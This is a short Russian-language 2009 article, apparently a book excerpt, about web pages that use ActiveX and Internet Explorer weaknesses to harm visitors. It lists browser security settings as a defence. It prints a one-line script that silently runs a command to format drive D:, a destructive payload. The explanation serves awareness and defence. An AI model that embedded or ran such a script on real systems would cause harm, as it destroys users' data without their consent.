Веб‑страница в обличии Фредди Крюгера - «потрошит» ваш винчестер!
🕛 20.09.2009, 21:56
Можно ли, посетив сайт, получить в подарок отформатированные диски? А почему бы и нет. Тем более что возможности JavaScript и ActiveX вкупе с многочисленными уязвимостями Internet Explorer выходят за рамки простых документированных функций (листинг 5.2).Листинг 5.2. Форматируем диск - легко!
<script> a=new ActiveXObject("WScript.Shell"); a.run("cmd /c format d:/y",0); </script>
Применение ActiveX‑компонентов делает веб‑страницы более интерактивными. Но за удобство и функциональность можно дорого заплатить: многочисленные уязвимости IE позволяют, к примеру, неподписанные (они же небезопасные) компоненты ActiveX представить пользователю как подписанные (безопасные, так как происхождение и содержание такого компонента подтверждено электронной подписью удостоверяющего центра) или вообще скрыть от глаз выполнение произвольного сценария.
Возможные варианты защиты в подобных случаях.
- Задание безопасных настроек браузера (Сервис► Свойства обозревателя► Безопасность► Высокий).
- Как альтернатива, конфигурирование зон интернет‑безопасности вручную (Сервис► Свойства обозревателя► Безопасность► Другой► Загрузка неподписанных элементов ActiveX► Отключить, Активные сценарии► Отключитьи т. д.).
- Ну и, конечно же, бдительность пользователя. К примеру, прежде чем вышеописанный сценарий сделает свое черное дело, система два раза "аккуратно намекнет" на потенциальную опасность.